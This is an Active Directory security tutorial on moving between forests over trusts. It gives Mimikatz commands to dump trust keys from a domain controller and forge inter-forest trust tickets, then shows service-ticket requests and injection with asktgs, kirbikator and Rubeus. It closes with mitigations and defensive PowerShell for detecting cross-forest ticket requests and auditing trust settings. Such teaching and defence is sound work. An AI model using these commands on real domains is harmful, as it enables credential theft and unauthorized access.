Trust Abuse Between Forests

Traversing between forests is not very different from traversing within a forest. The difference is that SID history cannot be abused across a forest trust the way it can within a forest, because SID filtering strips it from the trust ticket. As a result, we cannot escalate to Enterprise Admins in the other forest the way we can within our own.

Therefore, the privileges we will have in the target forest are limited to whatever the Domain Admins of our current domain have been granted in the external forest.

Using Inter-Forest Trust Tickets to Move Laterally

Step 1

  • To forge these tickets we need the trust key for the inter-forest trust, so we must find that first. This step requires Admin privileges, since the trust keys are read from the DC.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc>

Step 2

  • Now we can forge the inter-forest TGT (this step does not require Admin privileges).

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_forest> /ticket:C:\path\to\new\ticket.kirbi"'

Step 3

  • Then use the trust ticket to request a TGS for a service in the target forest.

# asktgs.exe
asktgs.exe <trust_ticket.kirbi> <service>/<target_domain>
# example
asktgs.exe .\trust_ticket1.kirbi CIFS/targetDC.bizcorp.local

Step 4

  • Then inject the service ticket obtained in the last step into the current logon session.

# kirbikator.exe
kirbikator.exe lsa .\<service_ticket_to_target.kirbi>

Step 5

  • Now check our access to the service the ticket was issued for.

# If CIFS...
ls \\target.DC\C$
# If WMI
Get-WmiObject Win32_Processor -ComputerName <target.dc>

Steps 3 and 4 Can Also Be Done with Rubeus.exe

.\Rubeus.exe asktgs /ticket:<TGT_trust_ticket.kirbi> /service:<service>/<target_DC> /dc:<target_DC> /ptt
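From the defender's side, the procedure above leaves a trail in the target forest: a forged trust ticket never touches the source forest's DCs, so the first place it appears is the target DC's Security log, where each service ticket issued on it is recorded as event 4769 with the requester's realm in the account name. The following PowerShell is an added example and is not part of the original notes. It runs simple hunting logic over constructed 4769 records; the local forest name corp.local, the dc<NN>.corp.local naming convention for domain controllers and the severity scoring are assumptions.

```powershell
# Added example, not part of the original notes: hunting logic over Security
# event 4769 (Kerberos service ticket requested) to surface service tickets
# issued to principals from an external realm. Assumptions: the local forest is
# corp.local, domain controllers follow a dc<NN>.corp.local naming convention,
# and the sample records below are constructed rather than exported from a DC.

$LocalForestDomains      = @('corp.local', 'child.corp.local')
$DomainControllerPattern = '^[A-Za-z]+/dc\d+\.corp\.local$'   # assumed DC naming convention

# Constructed 4769 records, using the EventData field names from the event XML
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2024-01-10 09:01:12'; TargetUserName = 'alice@CORP.LOCAL'
                       ServiceName = 'CIFS/fs01.corp.local';           TicketEncryptionType = '0x12'; IpAddress = '10.1.1.20' }
    [pscustomobject]@{ TimeCreated = '2024-01-10 09:02:40'; TargetUserName = 'svc_sql@BIZCORP.LOCAL'
                       ServiceName = 'MSSQLSvc/sql01.corp.local:1433'; TicketEncryptionType = '0x12'; IpAddress = '10.2.1.5' }
    [pscustomobject]@{ TimeCreated = '2024-01-10 09:05:03'; TargetUserName = 'Administrator@BIZCORP.LOCAL'
                       ServiceName = 'CIFS/dc01.corp.local';           TicketEncryptionType = '0x17'; IpAddress = '10.2.1.77' }
)

function Find-CrossForestTgsRequest {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [Parameter(Mandatory)] [string[]] $LocalDomains,
        [Parameter(Mandatory)] [string]   $DcPattern
    )
    foreach ($e in $Events) {
        # TargetUserName is user@REALM; the realm identifies the forest that issued the TGT
        $user, $realm = $e.TargetUserName -split '@', 2
        if (-not $realm) { continue }                                  # no realm suffix: nothing to classify
        if ($LocalDomains -contains $realm.ToLower()) { continue }     # local principal, no trust involved

        $reasons = @("principal from external realm $realm")
        if ($e.ServiceName -match $DcPattern)   { $reasons += 'service hosted on a domain controller' }
        if ($user -ieq 'Administrator')         { $reasons += 'built-in Administrator name used across the trust' }
        if ($e.TicketEncryptionType -eq '0x17') { $reasons += 'RC4 (0x17) ticket encryption' }

        # one signal is normal trust traffic; several together deserve a look
        $severity = switch ($reasons.Count) { 1 { 'Low' } 2 { 'Medium' } default { 'High' } }

        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            Principal   = $e.TargetUserName
            Service     = $e.ServiceName
            ClientIP    = $e.IpAddress
            Severity    = $severity
            Reasons     = $reasons -join '; '
        }
    }
}

# Dry run over the constructed records: alice is skipped, svc_sql is Low, Administrator is High
Find-CrossForestTgsRequest -Events $SampleEvents -LocalDomains $LocalForestDomains -DcPattern $DomainControllerPattern |
    Format-Table -AutoSize
```

To run this against live data, collect events with Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} and map the EventData fields from each event's XML onto the same property names. The realm check is the signal that matters; the RC4 flag is not proof of a forged ticket (a trust created without AES support issues RC4 tickets legitimately), but RC4 on a request for a DC service is out of place wherever AES is enabled and is worth correlating with the client address.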

Mitigations

  • Employ Selective Authentication so that users from the other forest are not automatically authenticated across the trust. Access to individual services between the forests should then be granted explicitly, by assigning the Allowed to Authenticate right on each resource that external users need.

  • Although SID filtering is enabled by default, make sure it is in place, as long as it does not break any applications or disrupt user access. This way Enterprise Admin SIDs carried in SID history cannot be used in forged inter-forest trust tickets (although Enterprise DC SIDs are exempt from filtering).
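Both mitigations above are flags on the trustedDomain object, so they can be audited rather than assumed. The PowerShell below is an added example, not part of the original notes: it reads the trustAttributes bitmask of every non-intra-forest trust and reports whether SID filtering has been weakened and whether Selective Authentication is on. It assumes the ActiveDirectory RSAT module and read access to the trust objects for a live run; the sample trusts at the bottom are constructed so the function can be exercised offline, and the bit values come from MS-ADTS.

```powershell
# Added example, not part of the original notes: audit forest and external
# trusts for the two mitigations described above. Assumes the ActiveDirectory
# RSAT module for a live run; the sample trust objects below are constructed.

# trustAttributes bits (MS-ADTS, trustAttributes)
$TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x04   # strict SID filtering on an external trust
$TRUST_ATTRIBUTE_FOREST_TRANSITIVE  = 0x08   # forest trust
$TRUST_ATTRIBUTE_CROSS_ORGANIZATION = 0x10   # Selective Authentication
$TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL  = 0x40   # forest trust that accepts SID history (netdom /EnableSIDHistory:Yes)

function Test-TrustHardening {
    [CmdletBinding()]
    param([Parameter(Mandatory)] [object[]] $Trusts)

    foreach ($t in $Trusts) {
        if ($t.IntraForest) { continue }   # parent/child and tree-root trusts are not subject to SID filtering

        $attr          = [int]$t.TrustAttributes
        $isForestTrust = ($attr -band $TRUST_ATTRIBUTE_FOREST_TRANSITIVE)  -ne 0
        $selectiveAuth = ($attr -band $TRUST_ATTRIBUTE_CROSS_ORGANIZATION) -ne 0

        # SID filtering is expressed differently for the two trust kinds:
        # a forest trust is weakened when TREAT_AS_EXTERNAL is set, an external
        # trust is weakened when the QUARANTINED_DOMAIN bit has been cleared.
        if ($isForestTrust) {
            $sidFilteringWeak = ($attr -band $TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL) -ne 0
        } else {
            $sidFilteringWeak = ($attr -band $TRUST_ATTRIBUTE_QUARANTINED_DOMAIN) -eq 0
        }

        $findings = @()
        if ($sidFilteringWeak) {
            if ($isForestTrust) {
                $findings += "SID history accepted over forest trust; fix: netdom trust <trusting_domain> /domain:$($t.Target) /EnableSIDHistory:No"
            } else {
                $findings += "SID filtering quarantine cleared on external trust; fix: netdom trust <trusting_domain> /domain:$($t.Target) /Quarantine:Yes"
            }
        }
        if (-not $selectiveAuth) {
            $findings += "forest-wide authentication; fix: netdom trust <trusting_domain> /domain:$($t.Target) /SelectiveAUTH:Yes, then grant Allowed to Authenticate per resource"
        }

        $kind    = if ($isForestTrust) { 'Forest' } else { 'External' }
        $summary = if ($findings.Count -gt 0) { $findings -join ' | ' } else { 'none' }

        [pscustomobject]@{
            Target        = $t.Target
            Kind          = $kind
            Direction     = $t.Direction
            SIDFiltering  = if ($sidFilteringWeak) { 'WEAK' } else { 'OK' }
            SelectiveAuth = $selectiveAuth
            Findings      = $summary
        }
    }
}

# Live run (requires RSAT):
#   Test-TrustHardening -Trusts (Get-ADTrust -Filter * -Properties TrustAttributes)

# Constructed sample trusts for an offline dry run
$SampleTrusts = @(
    [pscustomobject]@{ Target = 'bizcorp.local';   Direction = 'BiDirectional'; IntraForest = $false; TrustAttributes = 0x08 }                      # forest trust, default flags
    [pscustomobject]@{ Target = 'legacy.example';  Direction = 'Inbound';       IntraForest = $false; TrustAttributes = 0x00 }                      # external trust, quarantine cleared
    [pscustomobject]@{ Target = 'partner.example'; Direction = 'Outbound';      IntraForest = $false; TrustAttributes = (0x08 -bor 0x10 -bor 0x40) } # forest trust, selective auth on, SID history on
)
Test-TrustHardening -Trusts $SampleTrusts | Format-Table -AutoSize
```

On the constructed data bizcorp.local reports SID filtering OK but no Selective Authentication, legacy.example reports both weak, and partner.example has Selective Authentication but accepts SID history. Selective Authentication only protects the forest that is the resource (trusting) side of the trust, so run the audit in each forest rather than trusting the view from one of them.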
